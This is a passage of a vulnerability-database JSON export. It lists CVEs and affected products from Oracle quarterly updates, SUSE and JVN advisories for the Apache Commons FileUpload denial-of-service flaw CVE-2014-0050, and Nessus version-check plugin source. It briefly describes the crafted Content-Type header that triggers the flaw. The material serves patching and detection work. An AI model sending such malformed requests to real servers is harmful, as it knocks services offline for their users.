"Java FX", "version": "2.2", "operator": "eq"}, {"name": "MySQL Server", "version": "5.6", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.1", "operator": "eq"}, {"name": "Agile Engineering Data Management", "version": "6.1", "operator": "eq"}, {"name": "GoldenGate Monitor", "version": "11.1", "operator": "eq"}, {"name": "JD Edwards EnterpriseOne Technology", "version": "9.1", "operator": "eq"}, {"name": "MySQL Utilities", "version": "1.5", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "Oracle WebCenter Sites", "version": "11.1", "operator": "eq"}, {"name": "Oracle Argus Safety", "version": "8.0", "operator": "eq"}, {"name": "Solaris", "version": "10", "operator": "eq"}, {"name": "Cisco MDS Fiber Channel Switch", "version": "6.2", "operator": "eq"}, {"name": "PeopleSoft Enterprise Portal Interaction Hub", "version": "9.1", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "iPlanet Web Server", "version": "6.1", "operator": "eq"}, {"name": "PeopleSoft Enterprise SCM Strategic Sourcing", "version": "9.2", "operator": "eq"}], "cvelist": ["CVE-2015-2576", "CVE-2015-0489", "CVE-2015-0466", "CVE-2015-0473", "CVE-2015-0455", "CVE-2015-0484", "CVE-2014-3566", "CVE-2015-0504", "CVE-2015-0482", "CVE-2015-0235", "CVE-2015-0493", "CVE-2015-0463", "CVE-2015-2579", "CVE-2015-0474", "CVE-2015-0492", "CVE-2014-7809", "CVE-2015-0495", "CVE-2015-0440", "CVE-2015-2567", "CVE-2015-0502", "CVE-2015-0477", "CVE-2015-0469", "CVE-2015-2568", "CVE-2015-0506", "CVE-2015-2575", "CVE-2015-0447", "CVE-2014-3571", "CVE-2015-0476", "CVE-2015-0511", "CVE-2015-0458", "CVE-2015-0483", "CVE-2015-0487", "CVE-2015-0453", "CVE-2015-2572", "CVE-2015-0490", "CVE-2015-2574", "CVE-2015-0510", "CVE-2015-0497", "CVE-2015-0501", "CVE-2015-0450", "CVE-2015-0439", "CVE-2015-0448", "CVE-2015-0472", "CVE-2015-0462", "CVE-2015-0459", "CVE-2015-0507", "CVE-2015-2571", "CVE-2015-0475", "CVE-2015-2570", "CVE-2015-0509", "CVE-2015-0494", "CVE-2015-0461", "CVE-2015-0503", "CVE-2015-0449", "CVE-2014-0050", "CVE-2015-0500", "CVE-2015-0405", "CVE-2013-4286", "CVE-2015-0451", "CVE-2015-2577", "CVE-2014-1568", "CVE-2015-0478", "CVE-2015-2565", "CVE-2015-0496", "CVE-2015-0204", "CVE-2015-2578", "CVE-2015-2566", "CVE-2015-0460", "CVE-2015-0488", "CVE-2015-0470", "CVE-2015-0471", "CVE-2015-0423", "CVE-2015-0498", "CVE-2015-0438", "CVE-2015-0480", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2015-0486", "CVE-2015-0452", "CVE-2014-0112", "CVE-2015-0508", "CVE-2015-0457", "CVE-2015-0505", "CVE-2015-0465", "CVE-2015-0479", "CVE-2015-2573", "CVE-2015-0485", "CVE-2014-3569", "CVE-2015-0464", "CVE-2015-0491", "CVE-2015-0456", "CVE-2013-4545"], "modified": "2015-04-17T00:00:00", "id": "SECURITYVULNS:VULN:14393", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14393", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31331", "https://vulners.com/securityvulns/securityvulns:doc:31254", "https://vulners.com/securityvulns/securityvulns:doc:31257"], "description": "Quarterly update covers 138 different vulnerabilities.", "edition": 1, "reporter": "ORACLE", "published": "2014-11-03T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:57", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Endeca Information Discovery Studio", "version": "3.1", "operator": "eq"}, {"name": "Enterprise Data Quality", "version": "9.0", "operator": "eq"}, {"name": "Java SE", "version": "8", "operator": "eq"}, {"name": "Health Sciences Empirica Study", "version": "3.1", "operator": "eq"}, {"name": "OpenSSO", "version": "3.0", "operator": "eq"}, {"name": "MySQL", "version": "5.6", "operator": "eq"}, {"name": "Health Sciences Empirica Signal", "version": "7.3", "operator": "eq"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.2", "operator": "eq"}, {"name": "Retail Clearance Optimization Engine", "version": "14.0", "operator": "eq"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1", "operator": "eq"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "eq"}, {"name": "Oracle Identity Manager", "version": "11.1", "operator": "eq"}, {"name": "WebLogic Server", "version": "12.1", "operator": "eq"}, {"name": "Retail Allocation", "version": "13.2", "operator": "eq"}, {"name": "Application Performance Management", "version": "12.1", "operator": "eq"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "8.98", "operator": "eq"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.3", "operator": "eq"}, {"name": "Primavera Contract Management", "version": "14.0", "operator": "eq"}, {"name": "Health Sciences Empirica Inspections", "version": "1.0", "operator": "eq"}, {"name": "Retail Markdown Optimization", "version": "13.4", "operator": "eq"}, {"name": "Retail Invoice Matching", "version": "14.0", "operator": "eq"}, {"name": "Java SE Embedded", "version": "7", "operator": "eq"}, {"name": "VirtualBox", "version": "4.3", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "JDeveloper", "version": "12.1", "operator": "eq"}, {"name": "Solaris", "version": "11", "operator": "eq"}, {"name": "Transportation Management", "version": "6.3", "operator": "eq"}, {"name": "JavaFX", "version": "2.2", "operator": "eq"}, {"name": "Solaris", "version": "10", "operator": "eq"}, {"name": "Fusion Applications", "version": "11.1", "operator": "eq"}, {"name": "Agile PLM", "version": "9.3", "operator": "eq"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "Oracle Application Express", "version": "4.2", "operator": "eq"}, {"name": "Communications MetaSolv Solution", "version": "6.2", "operator": "eq"}], "cvelist": ["CVE-2014-6495", "CVE-2014-6506", "CVE-2014-6500", "CVE-2014-2478", "CVE-2014-6564", "CVE-2014-6482", "CVE-2014-6536", "CVE-2014-6544", "CVE-2014-6558", "CVE-2014-6516", "CVE-2014-6560", "CVE-2014-6530", "CVE-2014-6505", "CVE-2014-4301", "CVE-2014-6463", "CVE-2014-6515", "CVE-2014-6460", "CVE-2014-6554", "CVE-2014-6539", "CVE-2014-4292", "CVE-2014-6487", "CVE-2014-6538", "CVE-2014-6493", "CVE-2014-4280", "CVE-2014-6488", "CVE-2014-4282", "CVE-2014-6519", "CVE-2014-2472", "CVE-2014-6466", "CVE-2014-6517", "CVE-2014-6471", "CVE-2014-6501", "CVE-2014-6504", "CVE-2014-6534", "CVE-2014-6455", "CVE-2014-6459", "CVE-2014-6502", "CVE-2014-6472", "CVE-2014-0224", "CVE-2014-6492", "CVE-2014-6457", "CVE-2014-4284", "CVE-2014-6484", "CVE-2014-6476", "CVE-2014-6479", "CVE-2014-6535", "CVE-2014-6507", "CVE-2014-6503", "CVE-2014-6490", "CVE-2014-6557", "CVE-2014-6542", "CVE-2014-6454", "CVE-2014-4295", "CVE-2014-4291", "CVE-2014-6469", "CVE-2014-4278", "CVE-2014-6537", "CVE-2014-6486", "CVE-2014-6496", "CVE-2013-1741", "CVE-2014-6555", "CVE-2014-2476", "CVE-2014-6529", "CVE-2014-6562", "CVE-2014-4293", "CVE-2014-6511", "CVE-2014-6475", "CVE-2014-6485", "CVE-2014-6559", "CVE-2014-6470", "CVE-2014-4274", "CVE-2014-4294", "CVE-2014-6531", "CVE-2014-0119", "CVE-2014-6456", "CVE-2014-6547", "CVE-2014-2880", "CVE-2014-0114", "CVE-2014-4310", "CVE-2014-6543", "CVE-2014-6464", "CVE-2014-6468", "CVE-2014-4297", "CVE-2014-0050", "CVE-2014-6520", "CVE-2014-6551", "CVE-2014-6458", "CVE-2014-6532", "CVE-2014-6533", "CVE-2014-4276", "CVE-2014-4277", "CVE-2014-4288", "CVE-2014-6550", "CVE-2014-4296", "CVE-2014-4290", "CVE-2014-6478", "CVE-2014-6553", "CVE-2014-6483", "CVE-2014-6473", "CVE-2014-2475", "CVE-2014-4300", "CVE-2014-6546", "CVE-2014-6465", "CVE-2014-4299", "CVE-2014-6491", "CVE-2014-6508", "CVE-2014-4289", "CVE-2014-6453", "CVE-2014-2473", "CVE-2014-4285", "CVE-2014-6522", "CVE-2012-5615", "CVE-2014-6467", "CVE-2014-6523", "CVE-2014-6452", "CVE-2014-6513", "CVE-2014-6474", "CVE-2014-6489", "CVE-2014-2474", "CVE-2014-6563", "CVE-2014-6545", "CVE-2014-4281", "CVE-2014-4275", "CVE-2014-4287", "CVE-2014-6552", "CVE-2014-6540", "CVE-2014-6494", "CVE-2014-6461", "CVE-2014-4283", "CVE-2014-6527", "CVE-2014-6462", "CVE-2014-6561", "CVE-2014-4298", "CVE-2014-6499", "CVE-2014-6512", "CVE-2014-6498", "CVE-2014-6497"], "modified": "2014-11-03T00:00:00", "id": "SECURITYVULNS:VULN:14031", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14031", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32657", "https://vulners.com/securityvulns/securityvulns:doc:32654", "https://vulners.com/securityvulns/securityvulns:doc:32655", "https://vulners.com/securityvulns/securityvulns:doc:32656", "https://vulners.com/securityvulns/securityvulns:doc:32658", "https://vulners.com/securityvulns/securityvulns:doc:32659", "https://vulners.com/securityvulns/securityvulns:doc:32653"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "reporter": "ORACLE", "published": "2015-11-02T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PeopleSoft Enterprise HCM Talent Acquistion Managment", "version": "9.2", "operator": "eq"}, {"name": "Endeca Server", "version": "7.6", "operator": "eq"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "eq"}, {"name": "Oracle Traffic Director", "version": "11.1", "operator": "eq"}, {"name": "Java SE", "version": "8", "operator": "eq"}, {"name": "Oracle Communications LSMS", "version": "13.1", "operator": "eq"}, {"name": "Oracle Communications Messaging Server", "version": "8.0", "operator": "eq"}, {"name": "Oracle Enterprise Data Quality", "version": "12.1", "operator": "eq"}, {"name": "PeopleSoft Enterprise FSCM", "version": "9.2", "operator": "eq"}, {"name": "Hyperion Installation Technology", "version": "11.1", "operator": "eq"}, {"name": "Oracle", "version": "12.1", "operator": "eq"}, {"name": "Java SE Embedded", "version": "8", "operator": "eq"}, {"name": "Outside In Technology", "version": "8.5", "operator": "eq"}, {"name": "Exalogic Infrastructure", "version": "2.0", "operator": "eq"}, {"name": "Oracle", "version": "11.2", "operator": "eq"}, {"name": "Oracle Retail Returns Management", "version": "14.0", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "12.2", "operator": "eq"}, {"name": "Solaris", "version": "11.2", "operator": "eq"}, {"name": "MySQL Enterprise Monitor", "version": "3.0", "operator": "eq"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "eq"}, {"name": "Oracle Agile PLM", "version": "9.3", "operator": "eq"}, {"name": "PeopleSoft Enterprise HCM", "version": "9.2", "operator": "eq"}, {"name": "Oracle WebCenter Content", "version": "10.1", "operator": "eq"}, {"name": "Oracle Configurator", "version": "12.2", "operator": "eq"}, {"name": "Oracle Communications Performance Intelligence Center Software", "version": "10.1", "operator": "eq"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "7.1", "operator": "eq"}, {"name": "Oracle Identity Manager", "version": "11.1", "operator": "eq"}, {"name": "Enterprise Manager Base Platform", "version": "12.1", "operator": "eq"}, {"name": "FS1-2 Flash Storage System", "version": "6.3", "operator": "eq"}, {"name": "Integrated Lights Out Manager", "version": "3.2", "operator": "eq"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1", "operator": "eq"}, {"name": "OSS Support Tools", "version": "8.8", "operator": "eq"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "eq"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2", "operator": "eq"}, {"name": "Oracle Communications Tekelec HLR Router", "version": "4.0", "operator": "eq"}, {"name": "VirtualBox", "version": "5.0", "operator": "eq"}, {"name": "MySQL Server", "version": "5.6", "operator": "eq"}, {"name": "PeopleSoft Enterprise FIN Expenses", "version": "9.2", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.1", "operator": "eq"}, {"name": "Oracle Mobile Security Suite", "version": "3.0", "operator": "eq"}, {"name": "Oracle Communications User Data Repository", "version": "10.2", "operator": "eq"}, {"name": "Oracle Communications Convergence", "version": "3.0", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "JDeveloper", "version": "12.1", "operator": "eq"}, {"name": "Oracle Mobile Server", "version": "12.1", "operator": "eq"}, {"name": "Oracle Utilities Work and Asset Management", "version": "1.9", "operator": "eq"}, {"name": "Oracle Communications Policy Management", "version": "12.1", "operator": "eq"}, {"name": "Oracle WebCenter Sites", "version": "11.1", "operator": "eq"}, {"name": "JavaFX", "version": "2.2", "operator": "eq"}, {"name": "Fusion Middleware", "version": "12.1", "operator": "eq"}, {"name": "Siebel Applications", "version": "2015", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "12.1", "operator": "eq"}, {"name": "Oracle Retail Central Office", "version": "14.0", "operator": "eq"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "Oracle Fusion Applications", "version": "11.1", "operator": "eq"}, {"name": "Oracle Retail Open Commerce Platform", "version": "3.0", "operator": "eq"}], "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:49:41", "references": ["http://download.suse.com/patch/finder/?keywords=ba380f7e3fc44242f7f8d403bdc016a6", "https://bugzilla.novell.com/862781"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "1.1.1-1.37.1", "arch": "noarch", "packageFilename": "jakarta-commons-fileupload-1.1.1-1.37.1.noarch.rpm", "packageName": "jakarta-commons-fileupload", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.1.1-1.37.1", "arch": "noarch", "packageFilename": "jakarta-commons-fileupload-javadoc-1.1.1-1.37.1.noarch.rpm", "packageName": "jakarta-commons-fileupload-javadoc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.1.1-1.37.1", "arch": "noarch", "packageFilename": "jakarta-commons-fileupload-1.1.1-1.37.1.noarch.rpm", "packageName": "jakarta-commons-fileupload", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "1.1.1-1.37.1", "arch": "noarch", "packageFilename": "jakarta-commons-fileupload-javadoc-1.1.1-1.37.1.noarch.rpm", "packageName": "jakarta-commons-fileupload-javadoc", "operator": "lt"}], "description": "This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n", "edition": 1, "reporter": "Suse", "published": "2014-04-17T21:04:15", "title": "Security update for jakarta-commons-fileupload (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "modified": "2014-04-17T21:04:15", "id": "SUSE-SU-2014:0548-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00015.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:19", "references": [], "description": "\n ## Description\n\nApache Commons FileUpload provided by Apache Software Foundation contains an issue in processing a multi-part request, which may cause the process to be in an infinite loop. \n \nAs of 2014 February 12, an exploit tool to attack against this vulnerability has been confirmed.\n\n ## Impact\n\nProcessing a malformed request may cause the condition that the target system does not respond.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version that contains a fix fot this vulnerability: \n\n * [Apache Commons FileUpload 1.3.1](<http://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>)\n * [Apache Tomcat 8.0.3](<http://www.apache.org/dist/tomcat/tomcat-8/v8.0.3/>)\n * [Apache Tomcat 7.0.52](<http://www.apache.org/dist/tomcat/tomcat-7/v7.0.52/>)\n * [Apache Struts 2.3.16.1](<http://struts.apache.org/download.cgi#struts23161>)\n**Apply the Patch** \nIn the developer's repository, the respective source code that contains a fix for this vulnerability has been released. \n\n * Apache Commons FileUpload: <http://svn.apache.org/r1565143>\n * Apache Tomcat 8: <http://svn.apache.org/r1565163>\n * Apache Tomcat 7: <http://svn.apache.org/r1565169>\n**Workaround** \nApplying the following workaround may mitigate the effect of this vulnerability. \n\n * Limit the Content-Type header size less than 4091 bytes\nFor more information, please refer to the developer's site. \n\n ## Products Affected\n\n * Commons FileUpload 1.0 to 1.3\n * Apache Tomcat 8.0.0-RC1 to 8.0.1\n * Apache Tomcat 7.0.0 to 7.0.50\n * Products that use Apache Commons FileUpload\nAccording to the developer, Apache Tomcat 6 and earlier are not affected. \n \nThe developer also states that Apache Commons FileUpload is widely used for multiple Apache products, therefore, multiple Apache products other than Apache Tomcat may be affected by this vulnerability. \nAccording to the developer, the following products may be affected. \n\n * Jenkins\n * JSPWiki\n * JXP\n * Lucene-Solr\n * onemind-commons\n * Spring\n * Stapler\n * Struts 1, 2\n * WSDL2c\n", "edition": 3, "reporter": "Japan Vulnerability Notes", "published": "2014-02-10T00:00:00", "title": "JVN#14876762: Apache Commons FileUpload vulnerable to denial-of-service (DoS)", "type": "jvn", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0050"], "modified": "2016-07-12T00:00:00", "id": "JVN:14876762", "href": "http://jvn.jp/en/jp/JVN14876762/index.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:42:29", "references": ["http://www.debian.org/security/2014/dsa-2856", "https://packages.debian.org/source/wheezy/libcommons-fileupload-java", "https://packages.debian.org/source/squeeze/libcommons-fileupload-java"], "pluginID": "72401", "description": "It was discovered that the Apache Commons FileUpload package for Java could enter an infinite loop while processing a multipart request with a crafted Content-Type, resulting in a denial-of-service condition.", "edition": 4, "reporter": "Tenable", "published": "2014-02-10T00:00:00", "title": "Debian DSA-2856-1 : libcommons-fileupload-java - denial of service", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2015-11-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libcommons-fileupload-java", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2856.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72401", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2856. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72401);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/11/06 14:51:23 $\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"DSA\", value:\"2856\");\n\n script_name(english:\"Debian DSA-2856-1 : libcommons-fileupload-java - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libcommons-fileupload-java\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libcommons-fileupload-java\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-2856\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libcommons-fileupload-java packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcommons-fileupload-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libcommons-fileupload-java\", reference:\"1.2.2-1+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcommons-fileupload-java-doc\", reference:\"1.2.2-1+deb6u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcommons-fileupload-java\", reference:\"1.2.2-1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libcommons-fileupload-java-doc\", reference:\"1.2.2-1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-14T11:54:41", "references": ["https://www.redhat.com/security/data/cve/CVE-2014-0050.html", "http://rhn.redhat.com/errata/RHSA-2014-0253.html"], "pluginID": "72853", "description": "Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload, which is embedded in the JBoss Web component of JBoss EAP, handled small-sized buffers used by MultipartStream. A remote attacker could use this flaw to create a malformed Content-Type header for a multipart request, causing JBoss Web to enter an infinite loop when processing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat Enterprise Linux 5 and 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "edition": 7, "reporter": "Tenable", "published": "2014-03-06T00:00:00", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-09-12T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:jbossweb"], "id": "REDHAT-RHSA-2014-0253.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72853", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0253. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72853);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/09/12 15:00:26\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"RHSA\", value:\"2014:0253\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", 